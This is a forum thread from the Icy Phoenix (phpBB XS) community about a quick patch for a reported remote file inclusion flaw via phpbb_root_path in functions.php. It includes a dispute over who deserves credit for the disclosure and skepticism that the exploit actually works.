Icy Phoenix

Hi all,
since I've discovered a couple of issues with two files in XS, I've decided to release this quick patch.

As I said in the past, the best thing you can do to secure your site from REMOTE FILES INCLUSION using phpbb_root_path method is modifying the HTACCESS as I've suggested in another post in this section.

To apply this patch just replace the two files with the included ones.

Thank you.

P.S.: here is one of the link which reports the functions.php vulnerability http://www.securityfocus.com/bid/19961.

Mighty Gorgon wrote: [View Post]

Hi all,
since I've discovered a couple of issues with two files in XS, I've decided to release this quick patch.

As I said in the past, the best thing you can do to secure your site from REMOTE FILES INCLUSION using phpbb_root_path method is modifying the HTACCESS as I've suggested in another post in this section.

To apply this patch just replace the two files with the included ones.

Thank you.

Since "you have" ? oh then the credits is for you, perfect then I will release all the bugs in hack webpages.. coz here nobody gives credits..
c you

Sorry it's a wording problem... I didn't mean to take the credits for those since the functions.php RFI have been notified here at least in four other posts... but I've fixed another couple of issues in functions and bbcodes box... so I've decided to release this patch. But the "global" RFI fix in HTACCESS that I provided weeks ago fixes even the problem in functions.php which has been notified only recently but published only few days ago.

I'll change the wording if you think that I'm taking credits for it. :sad:


Here are the "credits" for who published this on that site (there are other sites with this):

http://www.securityfocus.com/bid/19961

ByPassNull wrote: [View Post]

Since "you have" ? oh then the credits is for you, perfect then I will release all the bugs in hack webpages.. coz here nobody gives credits..
c you

I don't even know what pocesses anyone to write such an arrogant post as that, ByPassNull, why should you have any credit? MG unofficially released the functions.php patch 2 days before you even posted your "fix", and Antonio Mercurio actually raised the issue 4 days before that...! Theres a lot of things going on behind the scenes here that you do not know, and theres no excuse for posts like that.

Well then add and look who is him. Again, I'm did the bug public dude.

Well, if you eally are AzzCoder, to whom we are all eternally grateful, could you please explain to me how you can parse a variable like phpbb_root_path to functions.php, because theres no way you can parse to a variable in a closed function - some of us have even tried hacking our websites with this method, it just doesn't work (the simple phpBB constant fix released here is just a precaution). Fortunately I'm not the only one who doesn't believe it: http://www.neothermic.com/phpBB/viewtopic.php?p=281

I also see AzzCoder (you?) are posting this same "exploit" for quite a few other phpbb related releases, with the exception of Integramod, and not phpbb directly yet, which is quite strange. It would be greatly appreciated if you could enlighten us as to why you chose not to inform them? Because there is absolutely no difference in the way the phpbb_root_path variable is defined in phpBBXS, all the phpbb modded derivatives I know, and phpbb, because no mods change something fundamental like that.

And as for integramod, why, is this AzzCoder, admin of integramod also you? http://integramod.com/home/profile.php?mode=viewprofile&u=10219
The same poor English skills would suggest a link ;)